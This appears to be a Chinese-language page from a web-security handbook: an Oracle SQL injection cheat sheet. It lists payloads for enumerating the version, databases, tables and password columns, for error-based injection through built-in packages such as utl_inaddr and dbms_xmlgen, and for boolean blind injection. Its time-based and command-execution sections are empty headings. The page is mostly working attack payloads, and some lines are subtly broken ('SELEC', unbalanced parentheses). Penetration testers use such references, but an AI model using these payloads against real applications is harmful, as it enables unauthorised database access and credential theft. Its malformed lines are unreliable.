search

Oracle

版本

SELECT user FROM dual UNION SELECT * FROM v$version

数据库名

SELECT global_name FROM global_name;
SELECT name FROM V$DATABASE;
SELECT instance_name FROM V$INSTANCE;
SELECT SYS.DATABASE_NAME FROM DUAL;

列库

SELECT DISTINCT owner FROM all_tables;

列表

SELECT table_name FROM all_tables;
SELECT owner, table_name FROM all_tables;
SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';

列字段

SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo';

基于报错注入

描述
执行

不合法的HTTP请求

SELECT utl_inaddr.get_host_name((select banner from v$version where rownum=1)) FROM dual

CTXSYS.DRITHSX.SN

SELECT CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1)) FROM dual

不合法的 XPath

SELECT ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user) FROM dual

不合法的 XML

SELECT to_char(dbms_xmlgen.getxml('select "'||(select user from sys.dual)||'" FROM sys.dual')) FROM dual

不合法的 XML

SELECT rtrim(extract(xmlagg(xmlelement("s", username || ',')),'/s').getstringval(),',') FROM all_users

SQL Error

SELECT NVL(CAST(LENGTH(USERNAME) AS VARCHAR(4000)),CHR(32)) FROM (SELECT USERNAME,ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1))

##### 盲注

描述

执行

:-------------

:-------------

版本 12.2

SELECT COUNT(*) FROM v$version WHERE banner LIKE 'Oracle%12.2%';

Subselect 启用

SELECT 1 FROM dual WHERE 1=(SELECT 1 FROM dual)

表log_table存在

SELECT 1 FROM dual WHERE 1=(SELECT 1 from log_table);

字段信息存在于 log_table

SELEC COUNT(*) FROM user_tab_cols WHERE column_name = 'MESSAGE' AND table_name = 'LOG_TABLE';

第一个字符为t

SELEC message FROM log_table WHERE rownum=1 AND message LIKE 't%';

##### 时间类型注入

命令执行

上一页MYSQL下一页PostgreSQL

最后更新于